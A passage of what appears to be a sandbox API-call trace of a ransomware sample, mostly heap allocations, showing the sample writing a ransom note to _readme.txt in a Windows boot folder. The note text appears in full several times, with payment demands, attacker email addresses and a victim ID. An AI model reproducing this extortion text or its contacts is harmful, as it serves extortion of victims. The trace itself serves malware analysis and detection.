RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.820] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0173.820] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.820] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.820] PathFindFileNameW (pszPath="") returned="" [0173.820] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.820] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.821] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.821] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.821] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0173.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.821] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0173.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.821] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.821] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.821] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.831] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.831] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.833] CloseHandle (hObject=0x690) returned 1 [0173.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.833] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e655fc0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e655fc0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.834] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e655fc0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e655fc0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.834] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.834] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e655fc0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e655fc0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e655fc0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.834] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e655fc0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e655fc0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e655fc0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.834] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.834] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.837] HeapFree (in: 